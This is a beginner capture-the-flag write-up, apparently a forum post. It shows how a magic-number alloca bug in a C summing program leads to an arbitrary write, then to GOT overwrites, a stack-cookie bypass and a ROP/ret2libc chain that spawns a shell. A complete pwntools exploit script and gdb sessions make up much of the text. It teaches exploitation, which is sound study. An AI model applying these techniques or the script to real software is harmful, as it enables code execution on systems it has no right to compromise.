Punishing code with magic numbers with ROP and ret2libc on an x86_64
Difficulty: Beginner
CTF: /zer0pts/pwn/protrude (ASLR is enabled here)
The vulnerable program
This program takes an integer N and N other integers as input. Then it calculates and prints the sum of these numbers.
A pretty standard exercise when you are learning a new programming language.
We are going to attempt to exploit it to get RCE. Take a few moments to absorb the code before moving on.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long n;

long read_long() {
    char buf[32];
    int readByte;
    memset(buf, 0, sizeof(buf)); // sets memory to 0
    readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
    if (readByte == 0) {
        puts("[ERROR] read failed"); // no bytes read = exit()
        exit(1);
    }
    return atol(buf); // convert input to long
}

void setup() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}

void calc_sum(void) {
    long i;
    long *array;
    long result;
    array = (long*)alloca(n * 4);
    for(i = 0; 0 <= i && i < n; i++) {
        printf("num[%ld] = ", i + 1);
        array[i] = read_long();
    }
    for(result = 0, i = 0; i < n; i++) {
        result += array[i];
    }
    printf("SUM = %ld\n", result);
}

int main() {
    setup();
    printf("n = ");
    n = read_long();
    if (n <= 0x00 || n > 22) { // size has to be 1-22
        puts("Invalid input");
    } else {
        calc_sum();
    }
    return 0;
}
Setup
Let’s set up a few things before we start:
- Disable ASLR
echo 0 > /proc/sys/kernel/randomize_va_space
- Disable PIE (during compilation)
- Enable DEP (during compilation)
- Enable stack protector (during compilation)
The binary is provided to you here.
Static Analysis
Inspecting code that handles user input.
Let’s take a closer look at the user input function.
long read_long() {
    char buf[32];
    int readByte;
    memset(buf, 0, sizeof(buf)); // sets memory to 0
    readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
    if (readByte == 0) {
        puts("[ERROR] read failed"); // no bytes read = exit()
        exit(1);
    }
    return atol(buf); // convert input to long
}
We have a buffer of 32 bytes, and read(0, buf, sizeof(buf)) reads at most 32 bytes. Therefore, there is no way to overflow the buffer using read. : (
We have an interesting call to atol(buf) at the end, but we cannot get anything out of it. The function simply returns 0 when the input does not start with a number.
Although the function implementation uses bad practices, nothing exploitable is going on here.
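To make the atol behaviour concrete, here is a rough Python model of how it parses its input. The name atol_like is made up for this illustration, and the model ignores overflow and locale handling. It only mirrors the documented behaviour: skip leading whitespace, read an optional sign, then consume digits up to the first non-digit.

```python
import re

# Hypothetical helper, not part of the challenge: a simplified model of C's atol().
_LEADING_INT = re.compile(rb"[ \t\n\v\f\r]*([+-]?[0-9]+)")


def atol_like(buf: bytes) -> int:
    """Return the integer at the start of buf, or 0 if there is none."""
    buf = buf.split(b"\x00", 1)[0]  # atol stops at the first NUL byte
    match = _LEADING_INT.match(buf)
    return int(match.group(1).decode()) if match else 0


print(atol_like(b"\n"))       # an empty line, as used later to write zeros
print(atol_like(b"14\n"))
print(atol_like(b"12abc"))
print(atol_like(b"/bin/sh"))
```

This is why sending an empty line is a convenient way to store a 0, and why every value we want to write later has to be sent as a decimal string.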
Inspecting the function that calculates the sum.
void calc_sum(void) {
    long i;
    long *array;
    long result;
    array = (long*)alloca(n * 4);
    for(i = 0; 0 <= i && i < n; i++) {
        printf("num[%ld] = ", i + 1);
        array[i] = read_long();
    }
    for(result = 0, i = 0; i < n; i++) {
        result += array[i];
    }
    printf("SUM = %ld\n", result);
}
If you are unfamiliar with alloca, run man 3 alloca to check the manual page for it.
The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller
alloca allocates memory in the stack frame of the caller, in this case, calc_sum.
This is an interesting choice. Usually, people use malloc to allocate space at runtime. But in this case, since n is bound to 1-22, it is not too bad: not much stack space is used.
Then, the N integers that are read with read_long() are placed in the memory we allocated.
The sum is calculated and the result is printed. Not much going on here either.
If you want to figure out the vulnerability on your own, stop here.
Introducing magic numbers
The term magic number or magic constant refers to the anti-pattern of using numbers directly in source code.
The use of magic numbers is often frowned upon. They make your code difficult to understand and often introduce subtle bugs.
Take a look at the following piece of code from Wikipedia.
for i from 1 to 52
    j := i + randomInt(53 - i) - 1
    a.swapEntries(i, j)
52 and 53 (and most other numbers that have no meaning in the local context) are magic numbers.
In the case above, the only problem this poses is a slight annoyance over the mysterious 52. Cases like the following, however, may create portability issues.
const int array_size = 20;
int *ptr = (int*) malloc(array_size * 4);
Here, 4 is the magic number. The piece of code above executes properly on systems where sizeof(int) == 4. But if it is 2, we allocate twice as much memory as we need, and if it is 8, the buffer is too small and the code breaks miserably when we attempt to use ptr.
If we were to write this properly, we would use something like this.
const int array_size = 20;
int *ptr = (int*) malloc(array_size * sizeof (int));
Okay, now you are equipped with the knowledge of magic numbers! Let us approach this problem again.
Finding an arbitrary write.
Take a look at:
array = (long*) alloca(n * 4);
This is the exact portability issue that we discussed earlier.
Only sizeof(char) is fixed as 1 by the C standard. Every other type only has a minimum size requirement, and the implementation picks whatever size it sees fit.
On x86_64 Linux, compilers make sizeof(long) == 8. This is convenient because a long then fits exactly in a register.
So we allocate space with alloca(n * 4), yet each element takes 8 bytes.
Therefore, we are only allocating enough memory for n/2 longs. Yet, we access all n of them. We are accessing memory not allocated for us! Also, we can write to that memory.
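The arithmetic behind this shortfall can be sketched in a few lines of Python. The constant SIZEOF_LONG = 8 is an assumption (x86_64 Linux), and the helper name shortfall is made up for this illustration. The compiler may round the alloca request up for alignment, so the exact index at which we start hitting other variables can be higher than this simple count suggests.

```python
SIZEOF_LONG = 8  # assumption: x86_64 Linux (LP64)
MAGIC = 4        # the constant hard-coded in alloca(n * 4)


def shortfall(n: int) -> dict:
    """Compare what alloca(n * 4) requests with what n longs actually need."""
    requested = n * MAGIC
    needed = n * SIZEOF_LONG
    return {
        "requested_bytes": requested,
        "needed_bytes": needed,
        "longs_that_fit": requested // SIZEOF_LONG,
        "bytes_written_past_request": needed - requested,
    }


print(shortfall(21))
```

For n = 21 the program asks for 84 bytes but the loop writes 168, so half of the writes land outside the requested buffer.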
Even more convenient is the fact that alloca was used. The extra memory we are addressing is on the stack.
The stack frame will usually look like this for the calc_sum function.
-----------------------------------------
|       Arguments to the function       |
-----------------------------------------
|            Return Address             |
-----------------------------------------
|      Local variables of calc_sum      |
-----------------------------------------
|          Alloca(n*4) buffer           |
-----------------------------------------
We can potentially overwrite the local variable array to achieve arbitrary write!
Exploiting the arbitrary write once.
Let’s fire up gdb:
gdb-peda$ r
n = 21
num[1] =
num[2] =
num[3] =
num[4] =
...
num[15] =
num[2] =
We use n = 21. Note that n is restricted to 1-22 (re-read the code if you are confused).
I just pass it empty strings so that num[1] through num[15] will be equal to 0.
We notice that after num[15], we loop back to num[2].
We have overwritten the local variable i!
Since we have overwritten i with 0, the loop starts again from num[2] (i++ runs at the end of the iteration and printf() prints i + 1).
We are looping indefinitely.
But looping indefinitely is not useful to us.
To write to memory beyond this, we overwrite i with 14 (exactly its current value), so that the next iteration gets us to num[16].
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
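The behaviour seen in these two gdb sessions can be reproduced with a toy model of the first loop in calc_sum. This is only a sketch: simulate_prompts and its parameters are made-up names, the model tracks nothing but i, and it takes from the sessions above the observation that the 15th value (array[14]) lands on i when n = 21.

```python
def simulate_prompts(n, inputs, i_slot=14, max_steps=40):
    """Return the prompt numbers (i + 1) printed by the first loop of calc_sum.

    i_slot is the array index that aliases the local variable i.
    max_steps stops the model when the loop would run forever.
    """
    i = 0
    prompts = []
    values = iter(inputs)
    while 0 <= i < n and len(prompts) < max_steps:
        prompts.append(i + 1)
        value = next(values, 0)  # missing input behaves like an empty line (0)
        if i == i_slot:
            i = value            # array[i_slot] = value overwrites i itself
        i += 1                   # the loop's i++
    return prompts


print(simulate_prompts(21, [])[:17])            # only empty lines
print(simulate_prompts(21, [0] * 14 + [14]))    # 14 sent at num[15]
```

With only empty lines the model wraps from 15 back to 2 and never terminates on its own. Sending 14 at num[15] keeps i unchanged, so the loop carries on to 16 and beyond.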
We can now write past the limit: num[17] overwrites the pointer array itself, and the iteration after that (num[18]) writes to array[17] through the new pointer. Since we control array, we can write anywhere we wish.
Let’s try to overwrite printf’s GOT entry so that it points at the puts() call in the code, to test things.
First, we get the GOT entry of printf.
gdb-peda$ x/i printf
0x400690 <printf@plt>: jmp QWORD PTR [rip+0x20099a] # 0x601030
0x601030 is the address of the GOT entry of printf.
We then get the location where the puts call is made.
gdb-peda$ disass read_long
Dump of assembler code for function read_long:
0x00000000004007c7 <+0>: push rbp
0x00000000004007c8 <+1>: mov rbp,rsp
...
0x0000000000400813 <+76>: lea rdi,[rip+0x28a] # 0x400aa4
0x000000000040081a <+83>: call 0x400660 <puts@plt>
...
End of assembler dump.
0x000000000040081a is the place we want the GOT entry to point to.
So we overwrite the value at 0x601030 with 0x000000000040081a.
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
num[17] = 6295464
num[18] = 4196378
num[%ld] =
[Inferior 1 (process 16567) exited with code 01]
As you can see, num[%ld] = was printed without formatting. Awesome.
printf@plt jumped to the call puts@plt instruction (and then to the call exit@plt that follows it).
But wait a minute…
The careful reader might have noticed that
0x601030 = 6295600
but we entered 6295464 in gdb, which is 0x601030 - 17*8.
Why so?
This is because the next iteration writes to array[17], not array[0]. Therefore, we correct the address by subtracting 17 * sizeof(long).
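The correction is simple enough to wrap in a helper so that it is never done by hand. The sketch below assumes sizeof(long) == 8 and that the write following the pointer overwrite goes to array[17], as observed in the gdb session. fake_array_base is a made-up name.

```python
SIZEOF_LONG = 8    # assumption: x86_64 Linux
WRITE_INDEX = 17   # the write after the pointer is replaced goes to array[17]


def fake_array_base(target: int, index: int = WRITE_INDEX) -> int:
    """Value to store in `array` so that array[index] is located at `target`."""
    return target - index * SIZEOF_LONG


printf_got = 0x601030
call_puts = 0x40081a

# These are the two decimal numbers typed at num[17] and num[18].
print(fake_array_base(printf_got), call_puts)
```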
With this, we have achieved arbitrary write!!
As of right now, we can only write to memory once. But it is still a step in the right direction.
Overwriting to memory more than once.
In order to write to arbitrary memory more than once, we need to find a way to jump to the top of the calc_sum() function whenever we want.
We will do this with a GOT entry overwrite.
Take a look at the following code from read_long.
readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
if (readByte == 0) {
    puts("[ERROR] read failed"); // no bytes read = exit()
    exit(1);
}
Bring up the man page of read: man 2 read.
On success, the number of bytes read is returned (zero indicates the end of file)
The if block only executes when we send EOF on the input stream. If we overwrite either the puts or the exit GOT entry to point to the top of the calc_sum function, we can send an EOF to jump to the top of the function. This will allow us to overwrite regions of memory multiple times.
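The zero return value on end of file is easy to observe from Python, whose os.read is a thin wrapper around the same system call. In this sketch a pipe with its write end closed stands in for the terminal EOF. That is an assumption made to keep the example self-contained, and read_after_close is a made-up name.

```python
import os


def read_after_close() -> bytes:
    """Read from a pipe whose write end is already closed."""
    read_fd, write_fd = os.pipe()
    os.close(write_fd)  # no writer left, so the reader sees end of file
    try:
        return os.read(read_fd, 32)
    finally:
        os.close(read_fd)


data = read_after_close()
print(len(data))  # the byte count that read_long compares against 0
```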
The relevant info:
calc_sum = 0x40088e = 4196494
puts@got = 0x601018
Again, we need to adjust the address so that array[17] lands exactly on 0x601018:
0x601018 - 17*8 = 6295440
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
num[17] = 6295440
num[18] = 4196494
num[19] = num[1] =
I used CTRL + D to send an EOF to the terminal. We can see num[1] in the output. We jumped to the start of calc_sum again!
We can use this to write to memory any number of times.
ROP and ret2libc
In this challenge, we have DEP, which prevents code on the stack from being executed, and stack cookies, which detect whether the stack frame has been overwritten.
Most of the time, no region of a process is both writable and executable.
For instance, let’s check our current executable.
[gnik@tinybot ~/]$ ./thebinary &
n =
[gnik@tinybot ~/]$ ps aux | grep thebinary
gnik 16890 0.0 0.0 10696 1040 pts/1 t 16:01 0:00 /home/gnik/thebinary
[gnik@tinybot ~/]$ pmap 16890
16890: /home/gnik/thebinary
0000000000400000 4K r-x-- thebinary
0000000000600000 4K r---- thebinary
0000000000601000 4K rw--- thebinary
00007ffff73ba000 104K r-x-- libpthread-2.27.so
00007ffff73d4000 2044K ----- libpthread-2.27.so
00007ffff75d3000 4K r---- libpthread-2.27.so
00007ffff75d4000 4K rw--- libpthread-2.27.so
00007ffff75d5000 16K rw--- [ anon ]
00007ffff75d9000 12K r-x-- libdl-2.27.so
00007ffff75dc000 2044K ----- libdl-2.27.so
00007ffff77db000 4K r---- libdl-2.27.so
00007ffff77dc000 4K rw--- libdl-2.27.so
00007ffff77dd000 1948K r-x-- libc-2.27.so
00007ffff79c4000 2048K ----- libc-2.27.so
00007ffff7bc4000 16K r---- libc-2.27.so
00007ffff7bc8000 8K rw--- libc-2.27.so
00007ffff7bca000 16K rw--- [ anon ]
00007ffff7bce000 24K r-x-- libgtk3-nocsd.so.0
00007ffff7bd4000 2044K ----- libgtk3-nocsd.so.0
00007ffff7dd3000 4K r---- libgtk3-nocsd.so.0
00007ffff7dd4000 4K rw--- libgtk3-nocsd.so.0
00007ffff7dd5000 156K r-x-- ld-2.27.so
00007ffff7fbe000 16K rw--- [ anon ]
00007ffff7ff7000 12K r---- [ anon ]
00007ffff7ffa000 8K r-x-- [ anon ]
00007ffff7ffc000 4K r---- ld-2.27.so
00007ffff7ffd000 4K rw--- ld-2.27.so
00007ffff7ffe000 4K rw--- [ anon ]
00007ffffffde000 132K rw--- [ stack ]
ffffffffff600000 4K r-x-- [ anon ]
total 10700K
As you can see, none of them have both the write and execute bit set.
This is a pretty common security measure, so we cannot write shellcode to a certain memory region and jump to it.
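Checking a long pmap listing by eye is error-prone, so here is a small sketch that does it mechanically. It assumes the plain pmap line shape shown above (address, size, five-character permission field, name), and the function name is made up for this illustration.

```python
def writable_and_executable(pmap_lines):
    """Return the mappings whose permission field contains both 'w' and 'x'."""
    hits = []
    for line in pmap_lines:
        fields = line.split()
        # Expected shape: address, size, permissions, name...
        # Header and total lines have fewer fields and are skipped.
        if len(fields) < 3 or len(fields[2]) != 5:
            continue
        perms = fields[2]
        if "w" in perms and "x" in perms:
            hits.append(line)
    return hits


sample = [
    "16890: /home/gnik/thebinary",
    "0000000000400000 4K r-x-- thebinary",
    "0000000000601000 4K rw--- thebinary",
    "00007ffffffde000 132K rw--- [ stack ]",
    "total 10700K",
]
print(writable_and_executable(sample))
```

An empty result means there is nowhere to place shellcode and run it directly.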
This is where ret2libc and ROP come into play.
With ret2libc, we jump to certain points in the libc library that is loaded at runtime. For instance, we can jump to potentially dangerous functions like system(), which is present in libc.
With ROP, we jump to small code segments in the address space of the process, each of which does a certain task before jumping to the next segment. Chaining a bunch of these ROP gadgets can hence be very powerful.
Our plan to achieve RCE is as follows:
- Find the address of system() in libc
- Find the address of the string '/bin/sh' in libc
- Find a ROP gadget that can place the address of the /bin/sh string in the rdi register.
- Jump to system()
Finding the address of system() and the string ‘/bin/sh’ is pretty straightforward.
gdb-peda$ start
....
Temporary breakpoint 1, 0x00000000004009bd in main ()
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff782c440 <__libc_system>
gdb-peda$ info proc map
process 17653
Mapped address spaces:
Start Addr End Addr Size Offset objfile
.......
.......
0x7ffff77dd000 0x7ffff79c4000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff79c4000 0x7ffff7bc4000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bc4000 0x7ffff7bc8000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bc8000 0x7ffff7bca000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bca000 0x7ffff7bce000 0x4000 0x0
0x7ffff7bce000 0x7ffff7bd4000 0x6000 0x0 /usr/lib/x86_64-linux-gnu/libgtk3-nocsd.so.0
.......
.......
gdb-peda$ find '/bin/sh' 0x7ffff77dd000 0x7ffff79c4000
Searching for '/bin/sh' in range: 0x7ffff77dd000 - 0x7ffff79c4000
Found 1 results, display max 1 items:
libc : 0x7ffff7990e9a --> 0x68732f6e69622f ('/bin/sh')
The system() function is located at 0x7ffff782c440.
The address of the string ‘/bin/sh’ is 0x7ffff7990e9a.
These addresses are most likely different on your machine.
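Since the absolute addresses change from machine to machine, it can help to think in terms of offsets from the libc base. The sketch below uses only the numbers from the gdb session above. The resulting offsets are valid only for this exact libc build, and rebase is a made-up helper name.

```python
LIBC_BASE = 0x7ffff77dd000  # start of the first libc-2.27.so mapping above
SYSTEM = 0x7ffff782c440
BIN_SH = 0x7ffff7990e9a

system_offset = SYSTEM - LIBC_BASE
bin_sh_offset = BIN_SH - LIBC_BASE


def rebase(libc_base: int):
    """Recompute both addresses for another load address of the same libc build."""
    return libc_base + system_offset, libc_base + bin_sh_offset


print(hex(system_offset), hex(bin_sh_offset))
```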
Learning to write exploit scripts.
Some familiarity with Python is assumed, although it is not strictly necessary to understand this section.
There are a lot of ways to write your exploit scripts.
I will keep things simple and write one using python3 and pwntools.
We will do everything we have done so far with gdb in Python.
Create a new Python script.
import pwn
import tty
You can install pwntools with pip and import pwn to work with it. We will also be using some constants from tty.
p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)
# g = pwn.gdb.attach(p, """
# """)
This is how you start a local process in pwntools. Note the raw = False and stdin=pwn.PTY!
These options are essential to our current project, since we write the EOF character to the stream instead of closing it. (Yes, this sounds weird, but it is necessary.)
You can experiment with attaching the debugger by uncommenting some lines here.
def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))

def send_eof():
    """
    Note: this sends 2 bytes (the EOF character plus the newline added by sendline)!!!
    """
    p.sendline(chr(tty.CEOF))
These are some of the functions that will be useful to us. The functions are self-explanatory. If you have never written an exploit before with pwntools, feel free to experiment here. p.sendline() is used to send a line to the process.
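To see what actually goes over the wire, here is a pwntools-free sketch that builds the four lines of one overwrite. Unlike overwrite_memory() above, this made-up helper takes the final target address and applies the 17 * 8 correction itself. Treat that difference as an assumption of the sketch, not as the script's interface.

```python
def overwrite_lines(target: int, data: int, index: int = 17) -> list:
    """Lines to send so that the 8 bytes at `target` are set to `data`."""
    return [
        b"14",                             # num[15]: keep i at 14 so the loop moves on
        b"",                               # num[16]: empty line, parsed as 0
        str(target - index * 8).encode(),  # num[17]: new value of the array pointer
        str(data).encode(),                # num[18]: value stored at `target`
    ]


# puts@got -> calc_sum, with the addresses found earlier
for line in overwrite_lines(0x601018, 0x40088e):
    print(line)
```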
setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()
p.interactive()
Okay, so now that all that is over, we will first overwrite the GOT entry of puts with calc_sum so that we can use EOF to jump to it again. Our nifty little overwrite_memory() function makes this easier.
The p.interactive() at the end is used to make the process interactive. After this, you can use the terminal for IO.
I recommend you experiment with the script.
Things that are necessary for the exploit to work.
These are some things that will be useful to us as we move on to ROP.
- Overwrite the GOT entry of __stack_chk_fail to point to the leaveq; ret instruction in calc_sum to bypass the stack smashing check.
- Overwrite the value of n with 30 so that we can overwrite more memory at once. (This is used in the ROP step later)
I will not show this in gdb since I have already shown you how to overwrite arbitrary memory, and the writeup will be pretty repetitive if I include this.
If you are confused, please refer to the code snippet below from the exploit script.
"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()
"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()
Finding the necessary ROP gadgets
I use the ROPgadget tool to find the necessary ROP gadgets in the executable. You can use any of the plethora of alternatives available to you. (gdb-peda also has one!)
[gnik@tinybot ~/]$ ROPgadget --binary thebinary
...
0x0000000000400a83 : pop rdi ; ret
...
0x0000000000400646 : ret
...
Unique gadgets found: 112
We will need two ROP gadgets, pop rdi; ret and ret.
pop rdi; ret loads the address of the string into the rdi register, and the ret gadget aligns the stack for the movaps instruction. (The reason this is necessary is left as an exercise.)
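Gadget finders essentially scan executable bytes for useful instruction encodings. As a minimal sketch of the idea, the code below searches a byte string for 5f c3, the encoding of pop rdi ; ret. The sample bytes and base address are invented for illustration, and real tools such as ROPgadget do far more (they disassemble backwards from every ret).

```python
POP_RDI_RET = b"\x5f\xc3"  # machine code for: pop rdi ; ret


def find_gadget(code: bytes, base: int, pattern: bytes = POP_RDI_RET):
    """Return every address at which `pattern` occurs in `code` loaded at `base`."""
    addresses = []
    start = code.find(pattern)
    while start != -1:
        addresses.append(base + start)
        start = code.find(pattern, start + 1)
    return addresses


# Made-up bytes: "pop r15 ; ret" is 41 5f c3, so skipping the 0x41 prefix
# byte yields "pop rdi ; ret" one byte later.
sample = b"\x90\x41\x5f\xc3\x90"
print([hex(a) for a in find_gadget(sample, 0x1000)])
```

This also shows why gadgets often sit in the middle of an unrelated instruction: the CPU decodes whatever bytes it is pointed at.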
Writing the final exploit script.
We finally have all the tools that we need to write the final exploit script.
The final exploit script looks something like this.
import pwn
import tty
p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)
#g = pwn.gdb.attach(p, """
#b *0x00000000004009b8
#c
#""")
def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))

def send_eof():
    """
    Note: this sends 2 bytes (the EOF character plus the newline added by sendline)!!!
    """
    p.sendline(chr(tty.CEOF))
setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()
"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()
"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()
"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()
Most of the script has already been discussed.
Let us focus on the rest that remains.
"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()
The first question that needs to be answered: why have some constants changed?
write_junk(13) was used while overwriting memory the last time, so why is write_junk(17) used this time?
This is because n = 21 in all previous cases, but we have just overwritten n with 30 so that we can overwrite more of the stack. alloca(n * 4) now reserves a larger buffer, hence the offset at which the local variable i is overwritten has changed.
You can experiment with the same method used above to figure out the offset when n = 30.
Okay, now let’s discuss the ROP part of the exploit.
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
To set up our exploit, we overwrite the stack up to the point where we can overwrite the return address.
We then place the address of the pop rdi; ret ROP gadget, followed by the address of the /bin/sh string.
When the function returns, it jumps to pop rdi; ret. Since the address of the string is next on the stack, pop rdi places it in the rdi register. And then we ret to another address…
… The address we jump to is the address of a ret instruction. The ret gadget is used to align our stack. (This is necessary since the movaps instruction (used by system()) needs the stack to be 16-byte aligned.) ret is a NOP in ROP (a gadget that does nothing).
Note that this might not be necessary if your stack is already 16-byte aligned.
We then place the address of system() on the stack. The ret gadget pops this address off the stack and jumps to system() in libc.
We have successfully placed the address of the string ‘/bin/sh’ in rdi and then jumped to system()!
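The walk through the chain can be checked with a tiny emulator. This is a sketch only: it knows just the two gadgets used here, treats any other address as the final jump target, and run_chain is a made-up name. The addresses are the ones found earlier in this writeup.

```python
POP_RDI_RET = 0x400a83
RET = 0x400646
BIN_SH = 0x7ffff7990e9a
SYSTEM = 0x7ffff782c440

# What each known gadget address executes, one instruction at a time.
GADGETS = {POP_RDI_RET: ["pop rdi", "ret"], RET: ["ret"]}


def run_chain(chain):
    """Follow the chain; return (rdi, final rip, bytes of stack consumed)."""
    rdi = None
    sp = 0            # index of the next 8-byte stack slot
    rip = chain[sp]   # the function's own ret pops the first entry
    sp += 1
    while rip in GADGETS:
        for insn in GADGETS[rip]:
            if insn == "pop rdi":
                rdi = chain[sp]
                sp += 1
            elif insn == "ret":
                rip = chain[sp]
                sp += 1
    return rdi, rip, sp * 8


with_ret = run_chain([POP_RDI_RET, BIN_SH, RET, SYSTEM])
without_ret = run_chain([POP_RDI_RET, BIN_SH, SYSTEM])
print([hex(v) for v in with_ret[:2]], with_ret[2], without_ret[2])
```

Both variants end up in system() with rdi pointing at the string. They differ by 8 bytes of consumed stack, which is what flips the 16-byte alignment at the moment system() starts running.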
Wait… There is more…
Remember that we overwrote the GOT entry of __stack_chk_fail so that a failed stack cookie check would simply continue to leaveq; ret.
Since we have overwritten the return address, we have surely overwritten the stack cookie.
Therefore, if we hadn’t overwritten the GOT entry of __stack_chk_fail, our exploit would have failed.
We could also avoid this by overwriting a GOT entry and jumping through that instead of through the return address.
Putting it all together
[gnik@tinybot ~/]$ python3 exploit.py
[+] Starting local process './thebinary': pid 18969
[*] Switching to interactive mode
n = 21
....
....
SUM = -3105548685935727921
$ $ whoami
whoami
gnik
This is my first post here on 0x00sec, so any feedback would be helpful. In an upcoming writeup, we will exploit the same executable but with ASLR enabled. : )